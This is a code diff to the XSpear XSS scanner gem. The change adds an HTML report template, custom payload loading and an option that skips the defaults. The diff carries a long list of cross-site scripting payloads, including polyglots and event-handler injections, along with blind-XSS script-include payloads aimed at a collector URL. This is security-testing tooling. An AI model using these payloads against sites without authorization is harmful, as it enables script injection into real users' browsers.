+              width: 100%;
+              background: #252C33;
+              margin: 0px auto;
+              border-radius: 0px;
+          }
+
+          /* Side Bar */
+          #sideMenu {
+              width: 240px;
+              height: 100%;
+              padding: 30px;
+              border-right: 1px solid rgba(0,0,0,.1);
+              background: #1b232a;
+              display: table-cell;
+              vertical-align: top;
+              color: #fff;
+          }
+          #sideMenuFixed{
+              position: fixed;
+              top: 0px;
+              left: 0px;
+              width: 240px;
+              height: 100%;
+              padding: 30px;
+              border-right: 1px solid rgba(0,0,0,.1);
+              background: #1b232a;
+              z-index: 9;
+          }
+          #sidecontent{
+              position: fixed;
+              width: 200px;
+              z-index: 10;
+          }
+          #sidecontent h1:first-child{
+              color: maroon;
+              text-shadow: 5px 5px 0px rgba(0,0,0,.2);
+              font-weight: 700;
+              font-size: 27px;
+              margin-left: -8px;
+          }
+          .menu {
+              list-style: none;
+              margin:  24px 0;
+              padding: 0;
+              width: 100%;
+          }
+          .menu li {
+              display: block;
+              height: 30px;
+              width: 100%;
+              line-height: 30px;
+              font-size: 14px;
+              font-weight: 300;
+              color: rgba(255, 255, 255, .7);
+              position: relative;
+              cursor: pointer;
+          }
+          .menu li:hover {
+              color: #FFF;
+          }
+          .menu li:first-child {
+              height: 35px;
+              line-height: 35px;
+              font-size: 16px;
+              font-weight: 700;
+              color: #DDD;
+              background: rgba(0,0,0,.08);
+              margin-left: -18px;
+              padding: 0px 10px;
+              border-radius: 8px;
+              cursor: default;
+          }
+          .addCategory {
+              font-size: 13px;
+              font-weight: 200;
+              color: rgba(255, 255, 255, .2);
+          }
+          .addCategory:hover {
+              color: #fff;
+          }
+
+          /* Content */
+          #content {
+              width: calc(100% - 240px);
+              height: 100%;
+              padding: 25px;
+              display: table-cell;
+          }
+
+          a{
+            color:rgba(255, 255, 255, .8);
+          }
+
+          /* Table */
+          table {
+              width: 100%;
+              border-collapse: collapse;
+          }
+          th {
+              text-align: left;
+              color: #fff;
+              font-weight: 400;
+              font-size: 13px;
+              text-transform: uppercase;
+              border-bottom: 1px solid rgba(255, 255, 255, 0.1);
+              padding: 0 10px;
+              padding-bottom: 14px;
+          }
+          tr:not(:first-child):hover {
+              background: rgba(255, 255, 255, 0.03);
+          }
+          td {
+              height: 40px;
+              line-height: 40px;
+              font-weight: 300;
+              color: white;
+              padding: 0 10px;
+              vertical-align: top;
+          }
+          /* Headers */
+          h1 {
+              font-size: 13px;
+              font-weight: 200;
+              letter-spacing: 1px;
+              text-transform: uppercase;
+              margin: 0;
+          }
+          h2 {
+              float: left;
+              letter-spacing: 1px;
+              margin: 0;
+              color: white;
+          }
+          h3 {
+              float: left;
+              color: #fff;
+              font-size: 32px;
+              font-weight: 300;
+              margin: 0;
+              margin-top: 8%;
+              margin-left: 20px;
+              margin-bottom: 6px;
+          }
+          .LOW {
+            background-color: darkgoldenrod;
+          }
+          .MEDIUM {
+            background-color: sienna;
+          }
+          .HIGH {
+            background-color: firebrick;
+          }
+          .VULN {
+            background-color: maroon;
+          }
+          .ISSUE{
+            border: 1px solid white;
+          }
+          code {
+              background: black;
+              border: 1px solid;
+              padding: 3px;
+              border-radius: 5px;
+              color: white;
+          }
+      </style>
+      <div id='container'>
+          <div id='sideMenu'>
+              <div id='sideMenuFixed'></div>
+              <div id='sidecontent'>
+                  <h1>XSPEAR</h1> v#{XSpear::VERSION}
+
+                  <ul class='menu'>
+                      <li><a href='#summary'>Report</a></li>
+                      <li><a href='#issues'>Issues</a></li>
+                      <li><a href='#available'>Available Objects</a></li>
+                      <li><a href='#raw_query'>Raw Query</a></li>
+                  </ul>
+                  <ul class='menu'>
+                      <li><a href='https://github.com/hahwul/XSpear'>About XSpear</a></li>
+                      <li><a href='https://github.com/hahwul/XSpear/issues/new'>Submit Bugs</a></li>
+                  </ul>
+              </div>
+          </div>
+          <div id='content'>
+              <h2 id=summary>Summary</h2><br><br>
+              #{t_info}
+              <br><br><h2 id=issues>Issues</h2><br>
+              <table>
+                  <tr>
+                      <td>No</td><td>Type</td><td>Issue</td><td>Method</td><td>Parameter</td><td>Payload</td><td>Description</td>
+                  </tr>
+                  #{t_issue}
+              </table>
+              <br><br><h2 id=available>Available Objects</h2><br><br>
+              #{t_available}
+              <br><br><h2 id=raw_query>Raw Query</h2><br><br>
+              #{t_rawquery}
+          </div>
+      </div>
+    """
+    return report
+  end
+
   def to_json
     buffer = []
     @issue.each do |i|
@@ -80,8 +431,6 @@ class XspearRepoter
     hash.to_json
   end
 
-  def to_html; end
-
   def to_cli
     rurl = ""
     if @url.length > 66

data/lib/XSpear/version.rb

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.3.3"
+  VERSION = "1.4.0"
 end

data/lib/XSpear.rb

@@ -23,11 +23,21 @@ class XspearScan
     else
       @params = options['params'].split(",")
     end
+    if options['cp'].nil?
+      @custom_payload = nil
+    else
+      @custom_payload = File.open(options['cp'])
+    end
     if options['all'] == true
       @all = true
     else
       @all = false
     end
+    if options['nx'] == true
+      @nx = true
+    else
+      @nx = false
+    end
     @thread = options['thread']
     @output = options['output']
     @verbose = options['verbose']
@@ -485,12 +495,21 @@ class XspearScan
         end
       end.each(&:join)
     end
+
     if @all == true
       log('s',"used test-all-params mode(-a)")
-      log('s',"creating a test query all param")
+      if @blind_url.nil?
+        log('s',"creating a test query all param")
+      else
+        log('s',"creating a test query all param + blind XSS")
+      end
     else
       log('s',"used test-reflected-params mode(default)")
-      log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
+      if @blind_url.nil?
+        log('s',"creating a test query [for reflected #{@reflected_params.length} param ]")
+      else
+        log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
+      end
     end
     @param_check_switch = false
     ## [ XSS Scanning ]
@@ -520,52 +539,53 @@ class XspearScan
     end
 
 
-    # Check Common XSS Payloads
-    onfocus_tags = [
-        "input",
-        "select",
-        "textarea",
-        "keygen"
-    ]
-    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
-
-
-    onfocus_tags.each do |t|
-      r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
-    end
-
-    # Check Selenium Common XSS Payloads
-    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
-    # + in Javascript payloads
-    r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-
-    # Check Selenium XSS Polyglot
-    r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    if @nx != true
+      # Check Common XSS Payloads
+      onfocus_tags = [
+          "input",
+          "select",
+          "textarea",
+          "keygen"
+      ]
+      r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
+
+
+      onfocus_tags.each do |t|
+        r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
+      end
 
+      # Check Selenium Common XSS Payloads
+      r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
+      # + in Javascript payloads
+      r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+
+      # Check Selenium XSS Polyglot
+      r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
 
+    end
     # Check Blind XSS Payload
     if !@blind_url.nil?
       r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -574,6 +594,20 @@ class XspearScan
       r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
     end
 
+    if !@custom_payload.nil?
+      log('s','load custom payload')
+      cps = JSON.parse @custom_payload.read
+      cps.each do |cp|
+        if cp['callback'] == 'P1'
+          r.push makeQueryPattern('x', cp['payload'], cp['payload'], 'h', "reflected "+"Custom Payload #{cp['descript']} ".red, CallbackStringMatch)
+        elsif cp['callback'] == 'P2'
+          r.push makeQueryPattern('x', cp['payload'], 'alert(45)', 'v', "triggered ".yellow+"Custom Payload #{cp['descript']}".red, CallbackXSSSelenium)
+        else
+
+        end
+      end
+      log('s',"loaded and creating #{cps.length} custom payloads")
+    end
 
     r = r.flatten
     r = r.flatten
@@ -582,7 +616,8 @@ class XspearScan
     if @verbose.to_i == 1
       @progress_bar = ProgressBar.new(r.length)
     end
-    threads = []
+
+
     r.each_slice(@thread) do |jobs|
       jobs.map do |node|
         Thread.new do
@@ -606,12 +641,15 @@ class XspearScan
       end.each(&:join)
     end
 
-
     @report.set_filtered @filtered_objects
     @report.set_endtime
     log('s', "finish scan. the report is being generated..")
     if @output == 'json'
       puts @report.to_json
+    elsif @output == 'html'
+      f = File.open 'report.html', 'w+'
+      f.write @report.to_html
+      log('s', "generate html report file. please open ./report.html file")
     else
       @report.to_cli
     end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.3.3
+  version: 1.4.0
 platform: ruby
 authors:
 - hahwul
 autorequire: 
 bindir: exe
 cert_chain: []
-date: 2020-02-07 00:00:00.000000000 Z
+date: 2020-02-12 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -186,11 +186,12 @@ files:
 - LICENSE.txt
 - README.md
 - Rakefile
-- XSpear-1.3.2.gem
+- XSpear-1.3.3.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup
 - config.json
+- custom_payload.json
 - exe/XSpear
 - forBurp/README.md
 - forBurp/otwa.sh